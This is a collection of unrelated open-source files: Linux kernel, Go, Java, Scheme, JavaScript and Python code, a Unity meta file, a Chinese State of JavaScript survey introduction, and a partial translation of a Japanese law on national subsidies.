unregister_netdevice_notifier(&ipq_dev_notifier);
proc_net_remove(&init_net, IPQ_PROC_FS_NAME);
cleanup_ipqnl: __maybe_unused
netlink_kernel_release(ipqnl);
mutex_lock(&ipqnl_mutex);
mutex_unlock(&ipqnl_mutex);
cleanup_netlink_notifier:
netlink_unregister_notifier(&ipq_nl_notifier);
return status;
}
static void __exit ip6_queue_fini(void)
{
nf_unregister_queue_handlers(&nfqh);
ipq_flush(NULL, 0);
#ifdef CONFIG_SYSCTL
unregister_sysctl_table(ipq_sysctl_header);
#endif
unregister_netdevice_notifier(&ipq_dev_notifier);
proc_net_remove(&init_net, IPQ_PROC_FS_NAME);
netlink_kernel_release(ipqnl);
mutex_lock(&ipqnl_mutex);
mutex_unlock(&ipqnl_mutex);
netlink_unregister_notifier(&ipq_nl_notifier);
}
MODULE_DESCRIPTION("IPv6 packet queue handler");
MODULE_LICENSE("GPL");
MODULE_ALIAS_NET_PF_PROTO(PF_NETLINK, NETLINK_IP6_FW);
module_init(ip6_queue_init);
module_exit(ip6_queue_fini);
| {
"pile_set_name": "Github"
} |
package libcontainerd
import "sync"
type queue struct {
sync.Mutex
fns map[string]chan struct{}
}
func (q *queue) append(id string, f func()) {
q.Lock()
defer q.Unlock()
if q.fns == nil {
q.fns = make(map[string]chan struct{})
}
done := make(chan struct{})
fn, ok := q.fns[id]
q.fns[id] = done
go func() {
if ok {
<-fn
}
f()
close(done)
q.Lock()
if q.fns[id] == done {
delete(q.fns, id)
}
q.Unlock()
}()
}
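// Hypothetical usage sketch (ids and functions are illustrative): functions
// appended under the same id run strictly in order, while functions appended
// under different ids may run concurrently.
//
//	var q queue
//	q.append("container-1", func() { fmt.Println("start") })
//	q.append("container-1", func() { fmt.Println("stop") }) // runs after "start"
//	q.append("container-2", func() { fmt.Println("other") }) // independent of container-1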
| {
"pile_set_name": "Github"
} |
// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO.
// You may push code into the target .java compilation unit if you wish to edit any member(s).
package nl.bzk.brp.model.data.kern;
import java.util.List;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import nl.bzk.brp.model.data.kern.HisDoc;
import org.springframework.transaction.annotation.Transactional;
privileged aspect HisDoc_Roo_Jpa_ActiveRecord {
@PersistenceContext
transient EntityManager HisDoc.entityManager;
public static final EntityManager HisDoc.entityManager() {
EntityManager em = new HisDoc().entityManager;
if (em == null) throw new IllegalStateException("Entity manager has not been injected (is the Spring Aspects JAR configured as an AJC/AJDT aspects library?)");
return em;
}
public static long HisDoc.countHisDocs() {
return entityManager().createQuery("SELECT COUNT(o) FROM HisDoc o", Long.class).getSingleResult();
}
public static List<HisDoc> HisDoc.findAllHisDocs() {
return entityManager().createQuery("SELECT o FROM HisDoc o", HisDoc.class).getResultList();
}
public static HisDoc HisDoc.findHisDoc(Integer id) {
if (id == null) return null;
return entityManager().find(HisDoc.class, id);
}
public static List<HisDoc> HisDoc.findHisDocEntries(int firstResult, int maxResults) {
return entityManager().createQuery("SELECT o FROM HisDoc o", HisDoc.class).setFirstResult(firstResult).setMaxResults(maxResults).getResultList();
}
@Transactional
public void HisDoc.persist() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.persist(this);
}
@Transactional
public void HisDoc.remove() {
if (this.entityManager == null) this.entityManager = entityManager();
if (this.entityManager.contains(this)) {
this.entityManager.remove(this);
} else {
HisDoc attached = HisDoc.findHisDoc(this.id);
this.entityManager.remove(attached);
}
}
@Transactional
public void HisDoc.flush() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.flush();
}
@Transactional
public void HisDoc.clear() {
if (this.entityManager == null) this.entityManager = entityManager();
this.entityManager.clear();
}
@Transactional
public HisDoc HisDoc.merge() {
if (this.entityManager == null) this.entityManager = entityManager();
HisDoc merged = this.entityManager.merge(this);
this.entityManager.flush();
return merged;
}
}
| {
"pile_set_name": "Github"
} |
package com.dotcms.publisher.assets.business;
import com.dotcms.publisher.assets.bean.PushedAsset;
import com.dotcms.publisher.util.PublisherUtil;
import com.dotmarketing.business.CacheLocator;
import com.dotmarketing.common.db.DotConnect;
import com.dotmarketing.db.DbConnectionFactory;
import com.dotmarketing.exception.DotDataException;
import com.dotmarketing.util.UtilMethods;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class PushedAssetsFactoryImpl extends PushedAssetsFactory {
private PushedAssetsCache cache=CacheLocator.getPushedAssetsCache();
public void savePushedAsset(PushedAsset asset) throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(INSERT_ASSETS);
db.addParam(asset.getBundleId());
db.addParam(asset.getAssetId());
db.addParam(asset.getAssetType());
db.addParam(asset.getPushDate());
db.addParam(asset.getEnvironmentId());
db.addParam(asset.getEndpointIds());
db.addParam(asset.getPublisher());
db.loadResult();
cache.removePushedAssetById(asset.getAssetId(), asset.getEnvironmentId());
}
@Override
public void deletePushedAssets(String bundleId, String environmentId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_BUNDLE_ENV);
db.addParam(bundleId);
db.addParam(environmentId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssetsByBundle(final String bundleId) throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_BUNDLE);
db.addParam(bundleId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssets(String assetId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_ASSET_ID);
db.addParam(assetId);
db.loadResult();
cache.clearCache();
}
@Override
public void deletePushedAssetsByEnvironment(final String assetId, final String environmentId) throws DotDataException {
new DotConnect().setSQL(DELETE_ASSETS_BY_ASSET_ID_AND_ENV)
.addParam(assetId).addParam(environmentId).loadResult();
cache.removePushedAssetById(assetId, environmentId);
}
@Override
public void deletePushedAssetsByEnvironment(String environmentId)
throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ASSETS_BY_ENVIRONMENT_ID);
db.addParam(environmentId);
db.loadResult();
cache.clearCache();
}
@Override
public List<PushedAsset> getPushedAssets(String bundleId, String environmentId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(bundleId) || !UtilMethods.isSet(environmentId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_BUNDLE_ENV);
dc.addParam(bundleId);
dc.addParam(environmentId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
@Override
public void deleteAllPushedAssets() throws DotDataException {
final DotConnect db = new DotConnect();
db.setSQL(DELETE_ALL_ASSETS);
db.loadResult();
cache.clearCache();
}
@Override
public List<PushedAsset> getPushedAssets(String assetId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(assetId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_ASSET_ID);
dc.addParam(assetId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
@Override
public List<PushedAsset> getPushedAssetsByEnvironment(String environmentId)
throws DotDataException {
List<PushedAsset> assets = new ArrayList<PushedAsset>();
if(!UtilMethods.isSet(environmentId)) {
return assets;
}
DotConnect dc = new DotConnect();
dc.setSQL(SELECT_ASSETS_BY_ENV_ID);
dc.addParam(environmentId);
List<Map<String, Object>> res = dc.loadObjectResults();
for(Map<String, Object> row : res){
PushedAsset asset = PublisherUtil.getPushedAssetByMap(row);
assets.add(asset);
}
return assets;
}
public PushedAsset getLastPushForAsset(final String assetId, final String environmentId, final String endpointIds) throws DotDataException {
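// Consult the cache first; on a miss, fall back to the database (Oracle
// needs a different row-limiting query) and cache the most recent push.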
PushedAsset asset = cache.getPushedAsset(assetId, environmentId);
if(null == asset ){
final DotConnect dc = new DotConnect();
if(DbConnectionFactory.isOracle()){
dc.setSQL(SELECT_ASSET_LAST_PUSHED_ORACLE);
} else {
dc.setSQL(SELECT_ASSET_LAST_PUSHED);
}
dc.addParam(assetId);
dc.addParam(environmentId);
dc.addParam(endpointIds);
dc.setMaxRows(1);
final List<Map<String, Object>> results = dc.loadObjectResults();
for(final Map<String, Object> row : results) {
asset = PublisherUtil.getPushedAssetByMap(row);
cache.add(asset);
}
}
return asset;
}
}
| {
"pile_set_name": "Github"
} |
#|
LambdaNative - a cross-platform Scheme framework
Copyright (c) 2009-2013, University of British Columbia
All rights reserved.
Redistribution and use in source and binary forms, with or
without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials
provided with the distribution.
* Neither the name of the University of British Columbia nor
the names of its contributors may be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|#
;; misc string manipulation
(define (string-trim str)
(if (string? str) (begin
;; Take any spaces off the front of the string
(set! str (let loop ((startstr str))
(if (and (fx> (string-length startstr) 0) (char=? (string-ref startstr 0) #\space))
(loop (substring startstr 1 (string-length startstr)))
startstr)))
;; Take any spaces off the end of the string and return it
(let loop2 ((endstr str))
(if (and (fx> (string-length endstr) 0) (char=? (string-ref endstr (- (string-length endstr) 1)) #\space))
(loop2 (substring endstr 0 (- (string-length endstr) 1)))
endstr)))
#f))
(define (string-remove-quotes str)
(let ((strlength (string-length str)))
(if (and
(fx>= (string-length str) 2)
;; If it starts with quotation marks
(string=? (substring str 0 1) "\"")
;; and ends with quotation marks
(string=? (substring str (- strlength 1) strlength) "\""))
;; Return string without quotation marks
(substring str 1 (- strlength 1))
;; Otherwise just return copy of same string
str))
)
(define (string-remove-spaces str)
(string-remove-char str #\space)
)
(define (string-remove-char str chr)
(let loop ((ret (list)) (lst (string->list str)))
(if (not (pair? lst))
(list->string ret)
(loop (if (char=? (car lst) chr) ret (append ret (list (car lst)))) (cdr lst))
)
)
)
(define string-split (lambda (str sep)
(if (string? str) (call-with-input-string str
(lambda (p) (read-all p (lambda (p) (read-line p sep))))) #f)))
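;; Usage sketch (illustrative values):
;; (string-split "a,b,c" #\,) => ("a" "b" "c")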
(define (string-upcase! str)
(do ((i (- (string-length str) 1) (- i 1)))
((< i 0) str)
(string-set! str i (char-upcase (string-ref str i)))))
(define (string-upcase str)
(string-upcase! (string-copy str)))
(define (string-downcase! str)
(do ((i (- (string-length str) 1) (- i 1)))
((< i 0) str)
(string-set! str i (char-downcase (string-ref str i)))))
(define (string-downcase str)
(string-downcase! (string-copy str)))
(define (string-capitalize! str) ; "hello" -> "Hello"
(let ((non-first-alpha #f) ; "hELLO" -> "Hello"
(str-len (string-length str))) ; "*hello" -> "*Hello"
(do ((i 0 (+ i 1))) ; "hello you" -> "Hello You"
((= i str-len) str)
(let ((c (string-ref str i)))
(if (char-alphabetic? c)
(if non-first-alpha
(string-set! str i (char-downcase c))
(begin
(set! non-first-alpha #t)
(string-set! str i (char-upcase c))))
(set! non-first-alpha #f))))))
(define (string-capitalize str)
(string-capitalize! (string-copy str)))
(define string-explode (lambda (str seplst)
(let loop ((strlst (string->list str))(tmp "")(res '()))
(if (= (length strlst) 0) (append res
(if (> (string-length tmp) 0) (list tmp) '()))
(let ((chop? (member (car strlst) seplst)))
(loop (cdr strlst) (if chop? "" (string-append tmp (string (car strlst))))
(if chop? (append res (list tmp)
(list (string (car strlst)))) res)))))))
(define (string-index str a-char . comp)
(let ((cmp (if (= (length comp) 1) (car comp) char=?)))
(let loop ((pos 0)) (cond
((>= pos (string-length str)) #f)
((cmp a-char (string-ref str pos)) pos)
(else (loop (fx+ pos 1)))))))
(define (string:contains str pattern cmp)
(let* ((pat-len (string-length pattern))
(search-span (- (string-length str) pat-len))
(c1 (if (zero? pat-len) #f (string-ref pattern 0)))
(c2 (if (<= pat-len 1) #f (string-ref pattern 1))))
(cond
((not c1) 0)
((not c2) (string-index str c1 cmp))
(else (let outer ((pos 0))
(cond
((> pos search-span) #f)
((not (cmp c1 (string-ref str pos)))
(outer (+ 1 pos)))
((not (cmp c2 (string-ref str (+ 1 pos))))
(outer (+ 1 pos)))
(else (let inner ((i-pat 2) (i-str (+ 2 pos)))
(if (>= i-pat pat-len) pos
(if (cmp (string-ref pattern i-pat) (string-ref str i-str))
(inner (+ 1 i-pat) (+ 1 i-str))
(outer (+ 1 pos))))))))))))
(define (string-contains str pattern) (string:contains str pattern char=?))
(define (string-contains-ci str pattern) (string:contains str pattern char-ci=?))
(define (string-count str pattern)
;; Each time the pattern is found take a substring until no longer found
(let loop ((curstr str) (count 0))
(let ((index (string:contains curstr pattern char=?)))
;; If pattern still found in string
(if index
;; If pattern starts at the end of the string - then last occurence
(if (fx= index (- (string-length curstr) 1))
(+ count 1)
(loop (substring curstr (+ index 1) (string-length curstr)) (+ count 1)))
count)))
)
(define (string-mapconcat sequence separator . proc)
(if (fx> (length sequence) 0)
(let* ((p (if (fx= (length proc) 1) (car proc) (lambda (x) x)))
(rev (reverse
(map (lambda (item)
(let ((val (p item)))
(cond
((string? val) val)
((char? val) (make-string 1 val))
(else (with-output-to-string "" (lambda () (write val)))))))
(cond
((list? sequence) sequence)
((vector? sequence) (vector->list sequence))
((string? sequence) (string->list sequence))
(else #f))))))
(apply string-append
(let loop ((s (cdr rev))
(acc (list (car rev))))
(if (null? s) acc (loop
(cdr s)
(cons (car s) (cons separator acc)))))))
;; If an empty list, then return an empty string
"")
)
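;; Usage sketch (illustrative values):
;; (string-mapconcat '("a" "b" "c") "-") => "a-b-c"
;; (string-mapconcat '(1 2 3) ", " number->string) => "1, 2, 3"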
(define (string-replace-char str oldchr newchr)
(if (and (string? str) (char? oldchr) (char? newchr))
(let loop ((i 0) (newstr (string-copy str)))
(if (fx= i (string-length str)) newstr
(loop (+ i 1) (begin (if (char=? (string-ref str i) oldchr) (string-set! newstr i newchr)) newstr))
))
str))
(define (string-replace-substring str searchstr replacestr)
(let ((searchstrlen (string-length searchstr)))
(if (and (string? str) (string? searchstr)
(string? replacestr) (>= (string-length str) (string-length searchstr)))
(let loop ((substr str)(res ""))
(if (= (string-length substr) 0) res
(let ((match? (and (>= (string-length substr) searchstrlen)
(string=? (substring substr 0 searchstrlen) searchstr))))
(loop (substring substr (if match? searchstrlen 1) (string-length substr))
(string-append res (if match? replacestr (substring substr 0 1))))))) str)))
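;; Usage sketch (illustrative values):
;; (string-replace-substring "hello world" "world" "scheme") => "hello scheme"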
(define (string-split-into-two str)
;; First trim the string
(set! str (string-trim str))
;; Handle the empty string by just returning two empty strings - one for each line
(if (fx= (string-length str) 0)
(list "" "")
;; Keep track of first and second line as lists of words
(let loop ((first (string-split str #\space)) (second (list)) (bestw (string-length str)))
(let* ((moveindex (- (length first) 1))
;; Move word from first line to second
(newfirst (list-head first moveindex))
(newsecond (append (list (list-ref first moveindex)) second))
;; Get new character count width needed for the two lines
(neww (max (string-length (string-mapconcat newfirst " ")) (string-length (string-mapconcat newsecond " ")))))
(if (< neww bestw)
;; If still better than the last, try moving another word
(loop newfirst newsecond neww)
;; Otherwise the last combination was best, recombine words of each line and return
(list (string-mapconcat first " ") (string-mapconcat second " "))))))
)
;; Inserts s after i characters in str
;; Precondition: 0 <= i <= (string-length str)
(define (string-insert-at str s i)
(string-append (substring str 0 i) s (substring str i (string-length str))))
;; @deffn {procedure} string-split-width str width font
;; Returns a modified version of string str which is wrapped
;; to fit into a window of width w using the fontsize obtained from font
;; --> Moved to glgui/glgui-primitives to prevent warning in Console apps.
(define (string-prefix? pattern str)
(let loop ((i 0))
(cond
((>= i (string-length pattern)) #t)
((>= i (string-length str)) #f)
((char=? (string-ref pattern i) (string-ref str i))
(loop (fx+ i 1)))
(else #f))))
(define (string-prefix-ci? pattern str)
(let loop ((i 0))
(cond
((>= i (string-length pattern)) #t)
((>= i (string-length str)) #f)
((char-ci=? (string-ref pattern i) (string-ref str i))
(loop (fx+ i 1)))
(else #f))))
(define (string-suffix? pattern str)
(let loop ((i (fx- (string-length pattern) 1)) (j (fx- (string-length str) 1)))
(cond
((negative? i) #t)
((negative? j) #f)
((char=? (string-ref pattern i) (string-ref str j))
(loop (fx- i 1) (fx- j 1)))
(else #f))))
(define (string-suffix-ci? pattern str)
(let loop ((i (fx- (string-length pattern) 1)) (j (fx- (string-length str) 1)))
(cond
((negative? i) #t)
((negative? j) #f)
((char-ci=? (string-ref pattern i) (string-ref str j))
(loop (fx- i 1) (fx- j 1)))
(else #f))))
;; https://srfi.schemers.org/srfi-28/srfi-28.html
(define (string-format format-string . objects)
(let ((buffer (open-output-string)))
(let loop ((format-list (string->list format-string))
(objects objects))
(cond ((null? format-list) (get-output-string buffer))
((char=? (car format-list) #\~)
(if (null? (cdr format-list))
(error 'format "Incomplete escape sequence")
(case (cadr format-list)
((#\a)
(if (null? objects)
(error 'format "No value for escape sequence")
(begin
(display (car objects) buffer)
(loop (cddr format-list) (cdr objects)))))
((#\s)
(if (null? objects)
(error 'format "No value for escape sequence")
(begin
(write (car objects) buffer)
(loop (cddr format-list) (cdr objects)))))
((#\%)
(newline buffer)
(loop (cddr format-list) objects))
((#\~)
(write-char #\~ buffer)
(loop (cddr format-list) objects))
(else
(error 'format "Unrecognized escape sequence")))))
(else (write-char (car format-list) buffer)
(loop (cdr format-list) objects))))))
;; eof
| {
"pile_set_name": "Github"
} |
// Forward to the target if the trap is not defined
var target = { foo: 'bar' };
for (let p of [new Proxy(target, {}), Proxy.revocable(target, {}).proxy]) {
assertEq(p.foo, 'bar');
assertEq(p['foo'], 'bar');
}
if (typeof Symbol === "function") {
var s = Symbol.for("moon");
var obj = {};
obj[s] = "dust";
for (let p of [new Proxy(obj, {}), Proxy.revocable(obj, {}).proxy])
assertEq(p[s], "dust");
}
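// For contrast, a handler that does define a `get` trap intercepts the lookup
// instead of forwarding to the target (hypothetical example):
//
//   var p2 = new Proxy(target, { get() { return 'intercepted'; } });
//   assertEq(p2.foo, 'intercepted');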
| {
"pile_set_name": "Github"
} |
@if (ViewContext.ModelState.IsValid == false)
{
<div class="alert alert-danger">
<strong>Error</strong>
<div asp-validation-summary="All" class="danger"></div>
</div>
} | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 897a479a4b813dd4dad8b385d35c2370
folderAsset: yes
timeCreated: 1497998668
licenseType: Pro
DefaultImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
import copy
import math
import logging
import torchvision
from .preprocess import Preprocess
LOG = logging.getLogger(__name__)
class CenterPad(Preprocess):
def __init__(self, target_size):
if isinstance(target_size, int):
target_size = (target_size, target_size)
self.target_size = target_size
def __call__(self, image, anns, meta):
meta = copy.deepcopy(meta)
anns = copy.deepcopy(anns)
LOG.debug('valid area before pad: %s, image size = %s', meta['valid_area'], image.size)
image, anns, ltrb = self.center_pad(image, anns)
meta['offset'] -= ltrb[:2]
meta['valid_area'][:2] += ltrb[:2]
LOG.debug('valid area after pad: %s, image size = %s', meta['valid_area'], image.size)
return image, anns, meta
def center_pad(self, image, anns):
w, h = image.size
left = int((self.target_size[0] - w) / 2.0)
top = int((self.target_size[1] - h) / 2.0)
if left < 0:
left = 0
if top < 0:
top = 0
right = self.target_size[0] - w - left
bottom = self.target_size[1] - h - top
if right < 0:
right = 0
if bottom < 0:
bottom = 0
ltrb = (left, top, right, bottom)
LOG.debug('pad with %s', ltrb)
# pad image
image = torchvision.transforms.functional.pad(
image, ltrb, fill=(124, 116, 104))
# pad annotations
for ann in anns:
ann['keypoints'][:, 0] += ltrb[0]
ann['keypoints'][:, 1] += ltrb[1]
ann['bbox'][0] += ltrb[0]
ann['bbox'][1] += ltrb[1]
return image, anns, ltrb
class CenterPadTight(Preprocess):
def __init__(self, multiple):
self.multiple = multiple
def __call__(self, image, anns, meta):
meta = copy.deepcopy(meta)
anns = copy.deepcopy(anns)
LOG.debug('valid area before pad: %s, image size = %s', meta['valid_area'], image.size)
image, anns, ltrb = self.center_pad(image, anns)
meta['offset'] -= ltrb[:2]
meta['valid_area'][:2] += ltrb[:2]
LOG.debug('valid area after pad: %s, image size = %s', meta['valid_area'], image.size)
return image, anns, meta
def center_pad(self, image, anns):
w, h = image.size
target_width = math.ceil((w - 1) / self.multiple) * self.multiple + 1
target_height = math.ceil((h - 1) / self.multiple) * self.multiple + 1
left = int((target_width - w) / 2.0)
top = int((target_height - h) / 2.0)
if left < 0:
left = 0
if top < 0:
top = 0
right = target_width - w - left
bottom = target_height - h - top
if right < 0:
right = 0
if bottom < 0:
bottom = 0
ltrb = (left, top, right, bottom)
LOG.debug('pad with %s', ltrb)
# pad image
image = torchvision.transforms.functional.pad(
image, ltrb, fill=(124, 116, 104))
# pad annotations
for ann in anns:
ann['keypoints'][:, 0] += ltrb[0]
ann['keypoints'][:, 1] += ltrb[1]
ann['bbox'][0] += ltrb[0]
ann['bbox'][1] += ltrb[1]
return image, anns, ltrb
class SquarePad(Preprocess):
def __call__(self, image, anns, meta):
center_pad = CenterPad(max(image.size))
return center_pad(image, anns, meta)
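# Minimal usage sketch (hypothetical data; assumes a PIL image, COCO-style
# annotations whose 'keypoints' and 'bbox' entries are numpy arrays, and a
# meta dict carrying numpy 'offset' and 'valid_area' fields):
#
#   pad = CenterPad((641, 641))
#   image, anns, meta = pad(image, anns, meta)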
| {
"pile_set_name": "Github"
} |
/**
* The MIT License
* Copyright (c) 2014-2016 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.specification.creature;
import com.iluwatar.specification.property.Color;
import com.iluwatar.specification.property.Movement;
import com.iluwatar.specification.property.Size;
/**
*
* Base class for concrete creatures.
*
*/
public abstract class AbstractCreature implements Creature {
private String name;
private Size size;
private Movement movement;
private Color color;
/**
* Constructor
*/
public AbstractCreature(String name, Size size, Movement movement, Color color) {
this.name = name;
this.size = size;
this.movement = movement;
this.color = color;
}
@Override
public String toString() {
return String.format("%s [size=%s, movement=%s, color=%s]", name, size, movement, color);
}
@Override
public String getName() {
return name;
}
@Override
public Size getSize() {
return size;
}
@Override
public Movement getMovement() {
return movement;
}
@Override
public Color getColor() {
return color;
}
}
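// Hypothetical concrete subclass sketch (illustrative; the enum values shown
// are assumptions, not necessarily part of the library):
//
// public class Dragon extends AbstractCreature {
//   public Dragon() {
//     super("Dragon", Size.LARGE, Movement.FLYING, Color.RED);
//   }
// }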
| {
"pile_set_name": "Github"
} |
---
type: introduction
section: introduction
locale: zh-CN
---
<span class="first-line"><span class="first-letter">JavaScript</span> 一直在发展。</span>新的库、框架、语言依旧层出不穷。这让前端开发变得十分有趣,同时,也让从业者感到力不从心。
为此,我们创立了 State of JavaScript 调查。今年,为了了解到开发者在用什么、喜欢什么、想学什么,我们调查了超过 20000 名 JavaScript 开发从业者。希望这些调查结果可以帮助你了解 JavaScript 生态圈的现状,并为你接下来的学习提供一定的参考。
如果你想进一步了解今年我们做了哪些改善,请看[这篇博文](https://medium.freecodecamp.org/the-state-of-javascript-2018-8322bcc51bd8)。
### 资源
我们注意到,很多人查看调查结果是为了决定接下来要学什么。因此,我们加入了一些优质的 JavaScript 学习资源,希望能为你指明方向。
声明:学习资源中,有些是我们的付费赞助商。尽管如此,这些学习资源的质量是毋庸置疑的。支持我们项目的人,也都是我们认识或者尊敬的人。
### 团队
State of JavaScript 调查是由以下人员创建并维护的:
- [Sacha Greif](https://twitter.com/sachagreif)(译者注:英文原文的作者):设计、撰写文章、编写代码
- [Raphael Benitte](https://twitter.com/benitteraphael):数据分析、数据可视化
- [Michael Rambeau](https://twitter.com/michaelrambeau):撰写文章、额外的数据统计
欢迎了解我的 React 与 GraphQL 的 JavaScript 框架 [Vulcan.js](http://vulcanjs.org);Raphael 的 React 数据可视化库 [Nivo.js](https://nivo.rocks);以及 Michael 的 JavaScript 工具推荐与排行榜 [Best of JS](https://bestofjs.org)。
### 下载我们的数据
你可以在[这里](https://www.kaggle.com/sachag/state-of-javascript-2018)下载调查结果数据。如果你基于此数据做出了自己的数据可视化页面,请告知我们!
### 其他链接
- [State of JavaScript 主页](https://stateofjs.com)
- [2016](https://2016.stateofjs.com/)
- [2017](https://2017.stateofjs.com/)
### 感谢
本网站字体选用 IMB Plex Mono。火焰动图引用自 [Animal Jam](https://animal-jam-roleplay.wikia.com/wiki/File:Pixel-fire-gif-1.gif)。如果你有任何问题与反馈,或者想获取调查结果的源数据,请[联系我们](mailto:[email protected])
现在,就让我们来看看今年的 JavaScript 发展情况吧!
P.S. 我们在今年的网站上花了大量精力。如果你到处乱点,小心把网站弄坏噢!
<span class="conclusion__byline">– Sacha, Raphaël, and Michael</span>
| {
"pile_set_name": "Github"
} |
Act on Temporary Special Provisions for National Subsidies, etc. (Extract)
(Act No. 15 of March 30, 1991) Last amended: Act No. 8 of March 31, 1993
Chapter I Prime Minister's Office (Articles 1 to 10)
Chapter II Ministry of Finance (Article 11)
Chapter III Ministry of Education (Articles 12 to 14)
Chapter IV Ministry of Agriculture, Forestry and Fisheries (Articles 15 and 16)
Chapter V Ministry of Transport (Articles 17 to 21)
Chapter VI Ministry of Construction (Articles 22 to 31)
Chapter VII Ministry of Home Affairs (Articles 32 and 33)
Chapter VIII Fiscal and Financial Measures for Local Governments (Article 34)
Supplementary Provisions
Chapter I Prime Minister's Office
(Partial Amendment of the National Land Survey Act)
Article 1
Omitted
(Partial Amendment of the Remote Islands Development Act)
Article 2
Omitted
(Partial Amendment of the Act on Special Measures for the Promotion and Development of the Amami Islands)
Article 3
Omitted
(Partial Amendment of the Act on Special Measures for Heavy Snowfall Areas)
Article 4
Omitted
(Partial Amendment of the Act on Special Measures for the Promotion and Development of Okinawa)
Article 5
Omitted
(Partial Amendment of the Act on Special Measures for the Comprehensive Development of Lake Biwa)
Article 6
Omitted
(Partial Amendment of the Act on Special Measures for Water Source Areas)
Article 7
Omitted
(Partial Amendment of the Act on Special Measures concerning the Preservation of Historic Natural Features and the Improvement of the Living Environment in Asuka Village)
Article 8
Omitted
(Partial Amendment of the Act Partially Amending the Act on Special Measures for the Promotion and Development of the Amami Islands and the Act on Special Measures for the Promotion of the Ogasawara Islands)
Article 9
Omitted
(Partial Amendment of the Act on Special Measures for the Revitalization of Depopulated Areas)
Article 10
Omitted
Chapter II Ministry of Finance
(Partial Amendment of the Earthquake Reinsurance Special Account Act)
Article 11
Omitted
Chapter III Ministry of Education
(Partial Amendment of the Act on the National Treasury's Sharing of Compulsory Education Expenses)
Article 12
Omitted
(Partial Amendment of the Act on Special Measures for the Development of Public Special Needs Schools)
Article 13
Omitted
(Partial Amendment of the Act on the National Treasury's Sharing of Facility Costs for Compulsory Education Schools)
Article 14
Omitted
Chapter IV Ministry of Agriculture, Forestry and Fisheries
(Partial Amendment of the Fishing Ports Act)
Article 15
Omitted
(Partial Amendment of the Forest Act)
Article 16
Omitted
Chapter V Ministry of Transport
(Partial Amendment of the Ports and Harbors Act)
Article 17
Omitted
(Partial Amendment of the Act on Port and Harbor Works for the Development of Hokkaido)
Article 18
Omitted
(Partial Amendment of the Automobile Liability Security Act)
Article 19
Omitted
(Partial Amendment of the Airport Development Act)
Article 20
Omitted
(Partial Amendment of the Act on Special Measures for the Development of Specified Port Facilities)
Article 21
Omitted
Chapter VI Ministry of Construction
(Partial Amendment of the Erosion Control Act)
Article 22
Omitted
(Partial Amendment of the Road Act)
Article 23
Omitted
(Partial Amendment of the Act on Special Measures for Securing Road Traffic in Specified Snowy and Cold Regions)
Article 24
Omitted
(Partial Amendment of the Coast Act)
Article 25
Omitted
